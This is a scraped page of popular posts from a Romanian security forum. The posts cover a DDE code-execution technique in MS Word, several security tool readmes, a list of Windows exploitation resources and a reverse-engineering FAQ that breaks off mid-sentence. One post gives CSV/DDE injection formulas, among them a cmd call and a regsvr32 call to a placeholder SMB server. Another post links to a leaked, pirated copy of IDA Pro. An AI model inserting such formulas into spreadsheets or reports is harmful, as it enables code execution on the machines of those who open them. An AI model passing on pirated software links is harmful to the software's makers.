Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 09/21/17 in all areas

  1. 8 points
    Breaking News Au implementat un bot in Chrome Web Store care da remove la toate extensiile cu cod aparent obfuscat / malicious (asta inseamna in viziunea lor: minificat sau pur si simplu prea mult -- intr-una din extensii aveam cod compilat de webpack si mi-au dat-o jos ca fisierele generate erau de 50-80k linii). Ideea principala e sa scape de extensiile care injecteaza adware si malware, dar in realitate, se caca pur si simplu pe munca oamenilor. La cei numai 400 de useri pe care-i aveam, cred ca e irelevant sa mentionez ca nu aveam asa ceva in sursa, iar scanarea lor si procesul de a o aduce inapoi in store e de tot cacatul. In plus, nu au setat niciun fel de regula clara care sa precizeze ce e acceptat si ce nu, pur si simplu daca vrei sa rezolvi situatia trebuie sa "rezolvi" ceva ce nu vezi, orbeste, si apoi sa tot dai submit la noi versiuni in sperata ca ti-o accepta din nou, numai ca e o limita si aici, iar daca o depasesti, ii da remove de tot. Nu am sa ma complic sa incerc sa o mai readuc in store si nici nu e singura pe care mi-au dat-o jos. Muie Google.
  2. 7 points
  3. 7 points
    Cyber Security Base with F-Secure is a free course series by University of Helsinki in collaboration with F-Secure Cyber Security Academy that focuses on building core knowledge and abilities related to the work of a cyber security professional. About the Course Series The course series consists of multiple smaller courses, each with a specific theme. Themes include a brief introduction to cyber security, operational security, web software development, types of vulnerabilities typical of web software, discovery and mitigation of such vulnerabilities, and advanced topics such as secure software architectures and cryptography. There will be several case studies as well as projects for participants. At the end of the course series, we'll also organize a friendly competition where participants get to find and fix vulnerabilities within a limited time frame. The course will launch on 31st of October, 2017. More information at: mooc.fi. The material for the last year's course is still available here. Leave us your email and we will send you updates about Cyber Security Base with F‑Secure https://cybersecuritybase.github.io/
  4. 7 points
    https://www.udemy.com/seo-training-link-building-backlinks-and-keyword-research/?couponCode=FREENOW https://www.udemy.com/insider-secrets-from-an-ethical-hacker-on-internet-safety/?couponCode=ISUFULLPROMO2017 https://www.udemy.com/python-complete/?couponCode=FREEFB4 250 Free Coupons Udemy Courses https://justpaste.it/1c5r5 Nu garantez că toate 250 cursuri sunt la liber dar gasiți voi ceva ce va interesează.
  5. 7 points
  6. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  7. 6 points
    ALL HEIL JETBRAINS
  8. 6 points
    Super, mai lipseste "3D Penis Recognition".
  9. 6 points
    A group of AI experts from The University of Nottingham and Kingston University managed to create a new method by which two-dimensional images of faces can be converted into 3D using machine learning. The researchers trained a convolutional neural-network to perform the task by feeding it tons of data on people’s faces. From there it figured out how to guess what a new face looks like from an previously unseen pic, including parts that it can’t see in the photograph. The 3D computer vision project really has to be seen to be believed, and you can try it out in a nifty demo here. The website doesn’t really do the full technology justice, but it’s bloody cool. Members of the team, which consists of Aaron S. Jackson, Adrian Bulat, Vasileios Argyriou, and Georgios Tzimiropoulos, will be presenting their work next month at the International Conference on Computer Vision in Venice. Aaron Jackson told via email: "The website demonstrating it was a quick mashup over the course of a few evenings. I basically made it because I thought seeing yourself in 3D is fun. A lot of research in computer vision is hard to present in a fun way because it’s things like new methods for detecting points on a face." An artificial intelligence that can turn pictures into faces is the tip of the iceberg here. The implications go far beyond amusing technology journalists for hours at a time with a website. In reality computer vision is one of the most useful purposes for deep learning and we can’t wait to see what Jackson and his fellow developers do next. Sursa: https://safeum.com/blog/2738-this-ai-program-can-make-3d-face-models-from-a-selfie.html
  10. 5 points
  11. 5 points
  12. 5 points
    What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods for transferring data between applications. One method is to use the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available. In our context DDE works by executing an application, that will provide the data (data provider). In a previous post1 We discussed using DDE in MSExcel to gain command execution, and have had great success in using this technique to bypass macro filtering mail gateways and corporate VBA policies. DDE isn’t only limited to Excel and Word has had DDE capabilities all this time. This has been mentioned by others2 as a possible avenue, but to our knowledge, no-one has actually demonstrated this to work. https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ L-am incercat in Word 2010, si merge.
  13. 5 points
    http://recordit.co/GTIROeGtVr
  14. 5 points
    parameth This tool can be used to brute discover GET and POST parameters Often when you are busting a directory for common files, you can identify scripts (for example test.php) that look like they need to be passed an unknown parameter. This hopefully can help find them. The -off flag allows you to specify an offset (helps with dynamic pages) so for example, if you were getting alternating response sizes of 4444 and 4448, set the offset to 5 and it will only show the stuff outside the norm #Usage ***usage: parameth.py [-h] [-v] [-u URL] [-p PARAMS] [-H HEADER] [-a AGENT] [-t THREADS] [-off VARIANCE] [-o OUT] [-P PROXY] [-x IGNORE] [-s SIZEIGNORE] [-d DATA] [-i IGMETH] [-c COOKIE]*** optional arguments: -h, --help show this help message and exit -v, --version Version Information -u URL, --url URL Target URL -p PARAMS, --params PARAMS Provide a list of parameters to scan for -H HEADER, --header HEADER Add a custom header to the requests -a AGENT, --agent AGENT Specify a user agent -t THREADS, --threads THREADS Specify the number of threads. -off VARIANCE, --variance VARIANCE The offset in difference to ignore (if dynamic pages) -diff DIFFERENCE, --difference DIFFERENCE Percentage difference in response (recommended 95) -o OUT, --out OUT Specify output file -P PROXY, --proxy PROXY Specify a proxy in the form http|s://[IP]:[PORT] -x IGNORE, --ignore IGNORE Specify a status to ignore eg. 404,302... -s SIZEIGNORE, --sizeignore SIZEIGNORE Ignore responses of specified size -d DATA, --data DATA Provide default post data (also taken from provided url after ?) -i IGMETH, --igmeth IGMETH Ignore GET or POST method. Specify g or p -c COOKIE, --cookie COOKIE Specify Cookies -T TIMEOUT, --timeout TIMEOUT Specify a timeout in seconds to wait between each request Adding new params from source: The following regexes might be useful to parse $_GET or $_POST parameters from source: $> grep -rioP '$_POST[\s*["']\s*\w+\s*["']\s*]' PHPSOURCE | grep -oP '$_POST[\s*["']\s*\w+\s*["']\s*]' | sed -e "s/$_POST[\s*["']//g" -e "s/\s*['"]\s*]//g" | sort -u > /tmp/outfile.txt $> grep -rioP '$_GET[\s*["']\s*\w+\s*["']\s*]' PHPSOURCE | grep -oP '$_GET[\s*["']\s*\w+\s*["']\s*]' | sed -e "s/$_GET[\s*["']//g" -e "s/\s*['"]\s*]//g" | sort -u > /tmp/outfile.txt Download parameth-master.zip or git clone https://github.com/maK-/parameth.git Source: https://github.com/mak-/parameth
  15. 5 points
    Ida Pro 7.0 + All Decompilers Full Leak-Pass Links: http://1024rd.com/ida-pro-7-0-all-decompilers-full-leak-pass (via: https://twitter.com/riusksk/status/913254688488792065) https://forum.reverse4you.org/showthread.php?t=2627 (via: https://twitter.com/malwareunicorn/status/913441973511454720) As always, use with caution, it has not been checked.
  16. 5 points
    https://www.udemy.com/bug-bounty-android-hacking/?couponCode=REVIEW_ONLY https://www.udemy.com/devslopes-ios11/?couponCode=CODEJAM https://www.udemy.com/learn-python-in-a-day/?couponCode=INST_CLUB https://www.udemy.com/python-for-ethical-hacking/?couponCode=FREEBIES
  17. 4 points
    Cea mai ok explicatie de pana acum pe care am gasit-o:
  18. 4 points
    Internetworking with TCP/IP Volume One (6th Edition)
  19. 4 points
  20. 4 points
    A trecut conferinta, parerea personala e ca a fost ceva mai reusita decat cea din anii trecuti. Mai multi oameni, locatie mai misto, CTF-uri, traininguri, 2 track-uri de prezentari... Vorbind de prezentari, RST-ul a fost reprezentat in 2 prezentari: Less Known Web Application Vulnerabilities, Ionut Popescu Man-in-the-browser attacks, Daniel Tomescu Majoritatea prezentarilor au fost publicate pe pagina evenimentului, aici si aici.
  21. 4 points
    OS X Auditor is a free Mac OS X computer forensics tool. OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze: the kernel extensions the system agents and daemons the third party's agents and daemons the old and deprecated system and third party's startup items the users' agents the users' downloaded files the installed applications It extracts: the users' quarantined files the users' Safari history, downloads, topsites, LastSession, HTML5 databases and localstore the users' Firefox cookies, downloads, formhistory, permissions, places and signons the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage the users' social and email accounts the WiFi access points the audited system has been connected to (and tries to geolocate them) It also looks for suspicious keywords in the .plist themselves. It can verify the reputation of each file on: Team Cymru's MHR VirusTotal your own local database It can aggregate all logs from the following directories into a zipball: /var/log (-> /private/var/log) /Library/logs the user's ~/Library/logs Finally, the results can be: rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep) rendered as a HTML log file sent to a Syslog server Author Jean-Philippe Teissier - @Jipe_ & al. Support OS X Auditor started as a week-end project and is now barely maintained. It has been forked by the great guys @ Yelp who created osxcollector. If you are looking for a production / corporate solution I do recommend you to move to osxcollector (https://github.com/Yelp/osxcollector) How to install Just copy all files from GitHub. Dependencies If you plan to run OS X Auditor on a Mac, you will get a full plist parsing support with the OS X Foundation through pyobjc: pip install pyobjc If you can't install pyobjc or if you plan to run OS X Auditor on another OS than Mac OS X, you may experience some troubles with the plist parsing: pip install biplist pip install plist These dependencies will be removed when a working native plist module will be available in python How to run OS X Auditor runs well with python >= 2.7.2 (2.7.9 is OK). It does not run with a different version of python yet (due to the plist nightmare) OS X Auditor is maintained to work on the lastest OS X version. It will do its best on older OS X versions. You must run it as root (or via sudo) if you want to use is on a running system, otherwise it won't be able to access some system and other users' files If you're using API keys from environment variables (see below), you need to use the sudo -E to use the users environment variables Type osxauditor.py -h to get all the available options, then run it with the selected options eg. [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html Setting Environment Variables VirusTotal API: export VT_API_KEY=aaaabbbbccccddddeeee Changelog Download: OSXAuditor-master.zip or git clone https://github.com/jipegit/OSXAuditor.git Source: https://github.com/jipegit/OSXAuditor
  22. 4 points
    Inca un articol recent pe aceiasi tema - http://georgemauer.net/2017/10/07/csv-injection.html. Exista cateva chestii dragute care se pot face cu DDE: =cmd|'/C calc'!A0 (exemplul clasic) =IExplore|WWW_OpenURL!www.mataigrasa.com =regsvr32|\\<fakeSmbServer>\\mataigrasa!A0 De cele mai multe ori am intalnit chestia asta in aplicatii web care genereaza rapoarte in format CSV/XLS unde tu ai un oarecare control asupra datelor care intra in raport.
  23. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  24. 4 points
    Hello, In Python, it's really easy to work with API calls using the requests module. To install it, just do: pip install requests Unfortunately, depending on your version, the API is largely SOAP based. The simplest way to consume VMWare's API is via one of the existing SDKs. Now, moving further and looking at a newer version of VMWare docs, we can see that there's an already developed module to interfere with it named pyvmomi. You can follow the instructions from the github to set everything up. If you follow carefully those steps you will find this https://github.com/vmware/pyvmomi-community-samples/blob/master/samples/ which contains tons of examples. Now, literally speaking, if you specifically need to play a bit with requests, you can do the following: 1. Import the needed modules 2. Make GET requests 3. Process the data 4. POST processed data 1. Import the needed modules import requests 2. Make GET requests GET_URL = 'https://httpbin.org/get' POST_URL = 'https://httpbin.org/post' data = requests.get(GET_URL).json() # this will be a json data structure containing the data you need The output of the above is: {'args': {}, 'headers': {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close', 'Host': 'httpbin.org', 'User-Agent': 'python-requests/2.18.1'}, 'origin': '86.120.146.226', 'url': 'https://httpbin.org/get'} 3. Process the data Let's suppose you want to modify the origin value into something else: data['origin'] = 'something else' 4. POST processed data r = requests.post(POST_URL, data=data) print(r.text) Now, the output of the above will be: { "args": {}, "data": "", "files": {}, "form": { "headers": [ "Accept", "Accept-Encoding", "Connection", "Host", "User-Agent" ], "origin": "something else", "url": "https://httpbin.org/get" }, "headers": { "Accept": "*/*", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Content-Length": "147", "Content-Type": "application/x-www-form-urlencoded", "Host": "httpbin.org", "User-Agent": "python-requests/2.18.1" }, "json": null, "origin": "86.120.146.226", "url": "https://httpbin.org/post" } Now, regarding your unicode issue, the error was raised because the data is a unicode/str variable, which means that you first have to make it a JSON object (which is basically a dict). In my example, you can see that I already called .json() which makes sure the data is a JSON object. But, if the returned data is a string, you won't be able to do that. To do that, you can use the json module: import json data = json.loads(data)
  25. 4 points
    There is no pre-established order of items in each category, the order is for contribution. If you want to contribute, please read the guide. Table of Contents Windows stack overflows Windows heap overflows Kernel based Windows overflows Windows Kernel Memory Corruption Return Oriented Programming Windows memory protections Bypassing filter and protections Typical windows exploits Exploit development tutorial series Corelan Team Fuzzysecurity Securitysift Whitehatters Academy TheSprawl Expdev-Kiuhnm Tools Windows stack overflows Stack Base Overflow Articles. Win32 Buffer Overflows (Location, Exploitation and Prevention) - by Dark spyrit [1999] Writing Stack Based Overflows on Windows - by Nish Bhalla’s [2005] Stack Smashing as of Today - by Hagen Fritsch [2009] SMASHING C++ VPTRS - by rix [2000] Windows heap overflows Heap Base Overflow Articles. Third Generation Exploitation smashing heap on 2k - by Halvar Flake [2002] Exploiting the MSRPC Heap Overflow Part 1 - by Dave Aitel (MS03-026) [September 2003] Exploiting the MSRPC Heap Overflow Part 2 - by Dave Aitel (MS03-026) [September 2003] Windows heap overflow penetration in black hat - by David Litchfield [2004] Glibc Adventures: The Forgotten Chunk - by François Goichon [2015] Pseudomonarchia jemallocum - by argp & huku The House Of Lore: Reloaded - by blackngel [2010] Malloc Des-Maleficarum - by blackngel [2009] free() exploitation technique - by huku Understanding the heap by breaking it - by Justin N. Ferguson [2007] The use of set_head to defeat the wilderness - by g463 The Malloc Maleficarum - by Phantasmal Phantasmagoria [2005] Exploiting The Wilderness - by Phantasmal Phantasmagoria [2004] Advanced Doug lea's malloc exploits - by jp Kernel based Windows overflows Kernel Base Exploit Development Articles. How to attack kernel based vulns on windows was done - by a Polish group called “sec-labs” [2003] Sec-lab old whitepaper Sec-lab old exploit Windows Local Kernel Exploitation (based on sec-lab research) - by S.K Chong [2004] How to exploit Windows kernel memory pool - by SoBeIt [2005] Exploiting remote kernel overflows in windows - by Eeye Security Kernel-mode Payloads on Windows in uninformed - by Matt Miller Exploiting 802.11 Wireless Driver Vulnerabilities on Windows BH US 2007 Attacking the Windows Kernel Remote and Local Exploitation of Network Drivers Exploiting Comon Flaws In Drivers I2OMGMT Driver Impersonation Attack Real World Kernel Pool Exploitation Exploit for windows 2k3 and 2k8 Alyzing local privilege escalations in win32k Intro to Windows Kernel Security Development There’s a party at ring0 and you’re invited Windows kernel vulnerability exploitation A New CVE-2015-0057 Exploit Technology - by Yu Wang [2016] Exploiting CVE-2014-4113 on Windows 8.1 - by Moritz Jodeit [2016] Easy local Windows Kernel exploitation - by Cesar Cerrudo [2012] Windows Kernel Exploitation - by Simone Cardona 2016 Exploiting MS16-098 RGNOBJ Integer Overflow on Windows 8.1 x64 bit by abusing GDI objects - by Saif Sherei 2017 Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes - by keen team [2015] Abusing GDI for ring0 exploit primitives - [2016] Windows Kernel Memory Corruption Windows Kernel Memory Corruption Exploit Development Articles. Remote Windows Kernel Exploitation - by Barnaby Jack [2005] windows kernel-mode payload fundamentals - by Skape [2006] exploiting 802.11 wireless driver vulnerabilities on windows - by Johnny Cache, H D Moore, skape [2007] Kernel Pool Exploitation on Windows 7 - by Tarjei Mandt [2011] Windows Kernel-mode GS Cookies and 1 bit of entropy - [2011] Subtle information disclosure in WIN32K.SYS syscall return values - [2011] nt!NtMapUserPhysicalPages and Kernel Stack-Spraying Techniques - [2011] SMEP: What is it, and how to beat it on Windows - [2011] Kernel Attacks through User-Mode Callbacks - by Tarjei Mandt [2011] Windows Security Hardening Through Kernel Address Protection - by Mateusz "j00ru" Jurczyk [2011] Reversing Windows8: Interesting Features of Kernel Security - by MJ0011 [2012] Smashing The Atom: Extraordinary String Based Attacks - by Tarjei Mandt [2012] Easy local Windows Kernel exploitation - by Cesar Cerrudo [2012] Using a Patched Vulnerability to Bypass Windows 8 x64 Driver Signature Enforcement - by MJ0011 [2012] MWR Labs Pwn2Own 2013 Write-up - Kernel Exploit - [2013] KASLR Bypass Mitigations in Windows 8.1 - [2013] First Dip Into the Kernel Pool: MS10-058 - by Jeremy [2014] Windows 8 Kernel Memory Protections Bypass - [2014] An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) - by Weimin Wu [2014] Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool - [2014] Exploiting the win32k!xxxEnableWndSBArrows use-after-free (CVE 2015-0057) bug on both 32-bit and 64-bit - by Aaron Adams [2015] Exploiting MS15-061 Microsoft Windows Kernel Use-After-Free (win32k!xxxSetClassLong) - by Dominic Wang [2015] Exploiting CVE-2015-2426, and How I Ported it to a Recent Windows 8.1 64-bit - by Cedric Halbronn [2015] Abusing GDI for ring0 exploit primitives - by Diego Juarez [2015] Duqu 2.0 Win32k exploit analysis - [2015] Return Oriented Programming The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls Blind return-oriented programming Sigreturn-oriented Programming Jump-Oriented Programming: A New Class of Code-Reuse Attack Out of control: Overcoming control-flow integrity ROP is Still Dangerous: Breaking Modern Defenses Loop-Oriented Programming(LOP): A New Code Reuse Attack to Bypass Modern Defenses - by Bingchen Lan, Yan Li, Hao Sun, Chao Su, Yao Liu, Qingkai Zeng [2015] Systematic Analysis of Defenses Against Return-Oriented Programming -by R. Skowyra, K. Casteel, H. Okhravi, N. Zeldovich, and W. Streilein [2013] Return-oriented programming without returns -by S.Checkoway, L. Davi, A. Dmitrienko, A. Sadeghi, H. Shacham, and M. Winandy [2010] Jump-oriented programming: a new class of code-reuse attack -by T. K. Bletsch, X. Jiang, V. W. Freeh, and Z. Liang [2011] Stitching the gadgets: on the ineffectiveness of coarse-grained control-flow integrity protection - by L. Davi, A. Sadeghi, and D. Lehmann [2014] Size does matter: Why using gadget-chain length to prevent code-reuse attacks is hard - by E. Göktas, E.Athanasopoulos, M. Polychronakis, H. Bos, and G.Portokalidis [2014] Buffer overflow attacks bypassing DEP (NX/XD bits) – part 1 - by Marco Mastropaolo [2005] Buffer overflow attacks bypassing DEP (NX/XD bits) – part 2 - by Marco Mastropaolo [2005] Practical Rop - by Dino Dai Zovi [2010] Exploitation with WriteProcessMemory - by Spencer Pratt [2010] Exploitation techniques and mitigations on Windows - by skape A little return oriented exploitation on Windows x86 – Part 1 - by Harmony Security and Stephen Fewer [2010] A little return oriented exploitation on Windows x86 – Part 2 - by Harmony Security and Stephen Fewer [2010] Windows memory protections Windows memory protections Introduction Articles. Data Execution Prevention /GS (Buffer Security Check) /SAFESEH ASLR SEHOP Bypassing filter and protections Windows memory protections Bypass Methods Articles. Third Generation Exploitation smashing heap on 2k - by Halvar Flake [2002] Creating Arbitrary Shellcode In Unicode Expanded Strings - by Chris Anley Advanced windows exploitation - by Dave Aitel [2003] Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server - by David Litchfield Reliable heap exploits and after that Windows Heap Exploitation (Win2KSP0 through WinXPSP2) - by Matt Conover in cansecwest 2004 Safely Searching Process Virtual Address Space - by Matt Miller [2004] IE exploit and used a technology called Heap Spray Bypassing hardware-enforced DEP - by Skape (Matt Miller) and Skywing (Ken Johnson) [October 2005] Exploiting Freelist[0] On XP Service Pack 2 - by Brett Moore [2005] Kernel-mode Payloads on Windows in uninformed Exploiting 802.11 Wireless Driver Vulnerabilities on Windows Exploiting Comon Flaws In Drivers Heap Feng Shui in JavaScript by Alexander sotirov [2007] Understanding and bypassing Windows Heap Protection - by Nicolas Waisman [2007] Heaps About Heaps - by Brett moore [2008] Bypassing browser memory protections in Windows Vista - by Mark Dowd and Alex Sotirov [2008] Attacking the Vista Heap - by ben hawkes [2008] Return oriented programming Exploitation without Code Injection - by Hovav Shacham (and others ) [2008] Token Kidnapping and a super reliable exploit for windows 2k3 and 2k8 - by Cesar Cerrudo [2008] Defeating DEP Immunity Way - by Pablo Sole [2008] Practical Windows XP2003 Heap Exploitation - by John McDonald and Chris Valasek [2009] Bypassing SEHOP - by Stefan Le Berre Damien Cauquil [2009] Interpreter Exploitation : Pointer Inference and JIT Spraying - by Dionysus Blazakis[2010] Write-up of Pwn2Own 2010 - by Peter Vreugdenhil All in one 0day presented in rootedCON - by Ruben Santamarta [2010] DEP/ASLR bypass using 3rd party - by Shahin Ramezany [2013] Bypassing EMET 5.0 - by René Freingruber [2014] Typical windows exploits Real-world HW-DEP bypass Exploit - by Devcode Bypassing DEP by returning into HeapCreate - by Toto First public ASLR bypass exploit by using partial overwrite - by Skape Heap spray and bypassing DEP - by Skylined First public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability Exploit codes of bypassing browsers memory protections PoC’s on Tokken TokenKidnapping . PoC for 2k3 -part 1 - by Cesar Cerrudo PoC’s on Tokken TokenKidnapping . PoC for 2k8 -part 2 - by Cesar Cerrudo An exploit works from win 3.1 to win 7 - by Tavis Ormandy KiTra0d Old ms08-067 metasploit module multi-target and DEP bypass PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass SMBv2 Exploit - by Stephen Fewer Microsoft IIS 7.5 remote heap buffer overflow - by redpantz Browser Exploitation Case Study for Internet Explorer 11 - by Moritz Jodeit [2016] Exploit development tutorial series Exploid Development Tutorial Series Base on Windows Operation System Articles. Corelan Team Exploit writing tutorial part 1 : Stack Based Overflows Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode Exploit writing tutorial part 3 : SEH Based Exploits Exploit writing tutorial part 3b : SEH Based Exploits – just another example Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR Exploit writing tutorial part 7 : Unicode – from 0x00410041 to calc Exploit writing tutorial part 8 : Win32 Egg Hunting Exploit writing tutorial part 9 : Introduction to Win32 shellcoding Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s Cube Exploit writing tutorial part 11 : Heap Spraying Demystified Fuzzysecurity Part 1: Introduction to Exploit Development Part 2: Saved Return Pointer Overflows Part 3: Structured Exception Handler (SEH) Part 4: Egg Hunters Part 5: Unicode 0x00410041 Part 6: Writing W32 shellcode Part 7: Return Oriented Programming Part 8: Spraying the Heap Chapter 1: Vanilla EIP Part 9: Spraying the Heap Chapter 2: Use-After-Free Part 10: Kernel Exploitation -> Stack Overflow Part 11: Kernel Exploitation -> Write-What-Where Part 12: Kernel Exploitation -> Null Pointer Dereference Part 13: Kernel Exploitation -> Uninitialized Stack Variable Part 14: Kernel Exploitation -> Integer Overflow Part 15: Kernel Exploitation -> UAF Part 16: Kernel Exploitation -> Pool Overflow Part 17: Kernel Exploitation -> GDI Bitmap Abuse (Win7-10 32/64bit) Heap Overflows For Humans 101 Heap Overflows For Humans 102 Heap Overflows For Humans 102.5 Heap Overflows For Humans 103 Heap Overflows For Humans 103.5 Securitysift Windows Exploit Development – Part 1: The Basics Windows Exploit Development – Part 2: Intro to Stack Based Overflows Windows Exploit Development – Part 3: Changing Offsets and Rebased Modules Windows Exploit Development – Part 4: Locating Shellcode With Jumps Windows Exploit Development – Part 5: Locating Shellcode With Egghunting Windows Exploit Development – Part 6: SEH Exploits Windows Exploit Development – Part 7: Unicode Buffer Overflows Whitehatters Academy Intro to Windows kernel exploitation 1/N: Kernel Debugging Intro to Windows kernel exploitation 2/N: HackSys Extremely Vulnerable Driver Intro to Windows kernel exploitation 3/N: My first Driver exploit Intro to Windows kernel exploitation 3.5/N: A bit more of the HackSys Driver Backdoor 103: Fully Undetected Backdoor 102 Backdoor 101 TheSprawl corelan - integer overflows - exercise solution heap overflows for humans - 102 - exercise solution exploit exercises - protostar - final levels exploit exercises - protostar - network levels exploit exercises - protostar - heap levels exploit exercises - protostar - format string levels exploit exercises - protostar - stack levels open security training - introduction to software exploits - uninitialized variable overflow open security training - introduction to software exploits - off-by-one open security training - introduction to re - bomb lab secret phase open security training - introductory x86 - buffer overflow mystery box corelan - tutorial 10 - exercise solution corelan - tutorial 9 - exercise solution corelan - tutorial 7 - exercise solution getting from seh to nseh corelan - tutorial 3b - exercise solution Expdev-Kiuhnm WinDbg Mona 2 Structure Exception Handling (SEH) Heap Windows Basics Shellcode Exploitme1 (ret eip overwrite) Exploitme2 (Stack cookies & SEH) Exploitme3 (DEP) Exploitme4 (ASLR) Exploitme5 (Heap Spraying & UAF) EMET 5.2 Internet Explorer 10 - Reverse Engineering IE Internet Explorer 10 - From one-byte-write to full process space read/write Internet Explorer 10 - God Mode (1) Internet Explorer 10 - God Mode (2) Internet Explorer 10 - Use-After-Free bug Internet Explorer 11 - Part 1 Internet Explorer 11 - Part 2 Tools Disassemblers, debuggers, and other static and dynamic analysis tools. angr - Platform-agnostic binary analysis framework developed at UCSB's Seclab. BARF - Multiplatform, open source Binary Analysis and Reverse engineering Framework. Binary Ninja - Multiplatform binary analysis IDE supporting various types of binaries and architecturs. Scriptable via Python. binnavi - Binary analysis IDE for reverse engineering based on graph visualization. Bokken - GUI for Pyew and Radare. Capstone - Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages. codebro - Web based code browser using clang to provide basic code analysis. dnSpy - .NET assembly editor, decompiler and debugger. Evan's Debugger (EDB) - A modular debugger with a Qt GUI. GDB - The GNU debugger. GEF - GDB Enhanced Features, for exploiters and reverse engineers. hackers-grep - A utility to search for strings in PE executables including imports, exports, and debug symbols. IDA Pro - Windows disassembler and debugger, with a free evaluation version. Immunity Debugger - Debugger for malware analysis and more, with a Python API. ltrace - Dynamic analysis for Linux executables. objdump - Part of GNU binutils, for static analysis of Linux binaries. OllyDbg - An assembly-level debugger for Windows executables. PANDA - Platform for Architecture-Neutral Dynamic Analysis PEDA - Python Exploit Development Assistance for GDB, an enhanced display with added commands. pestudio - Perform static analysis of Windows executables. Process Monitor - Advanced monitoring tool for Windows programs. Pyew - Python tool for malware analysis. Radare2 - Reverse engineering framework, with debugger support. SMRT - Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis. strace - Dynamic analysis for Linux executables. Udis86 - Disassembler library and tool for x86 and x86_64. Vivisect - Python tool for malware analysis. X64dbg - An open-source x64/x32 debugger for windows. Sursa: https://github.com/enddo/awesome-windows-exploitation
  26. 4 points
    Cadourile nu inseamna mare lucru intr-o relatie, cel putin cele materiale. Traiti expriente noi impreuna, vizitati locuri noi etc. Asa o sa formati o legatura stransa, nu printr-un schimb de cadouri. Si pe langa asta, ia initiativa, fii hotarat si sigur pe tine. Mentine-i atentia si curiozitatea, n-o lasa sa se plictiseasca. Asta e doar parerea mea.
  27. 4 points
    Asking the real question. Mi se pare mie sau chiar nu ai futut-o inca?
  28. 4 points
    Exe2Image A simple utility to convert EXE files to PNG images and vice versa. Screenshots Putty.exe converted to an image. Downloads: Exe2Image.7z Source code (.zip) Source code (tar.gz) Source: https://github.com/OsandaMalith/Exe2Image
  29. 4 points
    2017-09-24: FAQ: How to learn reverse-engineering? faq Obligatory FAQ note: Sometimes I get asked questions, e.g. on IRC, via e-mail or during my livestreams. And sometimes I get asked the same question repeatedly. To save myself some time (*cough* and be able to give the same answer instead of conflicting ones *cough*) I decided to write up selected question and answer pairs in separate blog posts. Please remember that these answers are by no means authoritative - they are limited by my experience, my knowledge and my opinions on things. Do look in the comment section as well - a lot of smart people read my blog and might have a different, and likely better, answer to the same question. If you disagree or just have something to add - by all means, please do comment. Q: How to learn reverse-engineering? Q: Could you recommend any resources for learning reverse-engineering? A: For the sake of this blog post I'll assume that the question is about reverse code engineering (RE for short), as I don't know anything about reverse hardware/chip engineering. My answer is also going to be pretty high-level, but I'll assume that the main subject of interest is x86 as that is the architecture one usually starts with. Please also note that this is not a reverse-engineering tutorial - it's a set of tips that are supposed to hint you what to learn first. I'll start by noting two crucial things: 1. RE is best learnt by practice. One does not learn RE by reading about it or watching tutorials - these are valuable additions and allow you to pick up tricks, tools and the general workflow, but should not be the core of any learning process. 2. RE takes time. A lot of time. Please prepare yourself for reverse-engineering sessions which will takes multiple (or even tens of) hours to finish. This is normal - don't be afraid to dedicate the required time. While reverse-engineering a given target one usually uses a combination of three means: • Analysis of the dead-listing - i.e. analyzing the result of the disassembly of a binary file, commonly known as static analysis. • Debugging the live target - i.e. using a debugger on a running process, commonly known as dynamic analysis. • Behavioral analysis - i.e. using high-level tools to get selected signals on what the process is doing; examples might be strace or Process Monitor. Given the above, a high-level advice would be to learn a mix of the means listed above while working through a series of reverse-engineering challenges (e.g. crackmes or CTF RE tasks1). 1 While reversing a crackme/CTF task is slightly different than a normal application, the former will teach you a lot of anti-RE tricks you might find and how to deal with them. Normal applications however are usually larger and it's easier to get lost in the huge code base at the beginning. Below, in sections detailing the techniques mentioned above, I've listed resources and tools that one might want to get familiar with when just starting. Please note that these are just examples and other (similar) tools might be better suited for a given person - I encourage you to experiment with different programs and see what you like best. Analysis of the dead-listing Time to call out the elephant in the room - yes, you will have to learn x86 assembly. There isn't a specific tutorial or course I would recommend (please check out the comment section though), however I would suggest starting with 64-bit or 32-bit x86 assembly. Do not start with 16-bit DOS/real-mode stuff - things are different in 64-/32-bit modes (plus 64-/32-bit modes are easier in user-land2) and 16-bit is not used almost anywhere in modern applications. Of course if you are curious about the old times and care about things like DOS or BIOS, then by all means, learn 16-bit assembly at some point - just not as the first variation. 2 16-bit assembly has a really weird addressing mode which has been replaced in 64-/32-bit mode with a different, more intuitive model; another change is related to increasing the number of possible address encodings in opcodes, which make things easier when writing assembly. When learning assembly try two things: • See how your C/C++ compiler translates high-level code into assembly. While almost all compilers have an option to generate output in assembly (instead of machine code wrapped in object files), I would like to recommend the Compiler Explorer (aka godbolt.org) project for this purpose - it's an easy to use online service that automates this process. • Try writing some assembly code from scratch. It might be a pain to find a tutorial / book for your architecture + operating system + assembler (i.e. assembly compiler) of choice3 and later to actually compile and link the created code, but it's a skill 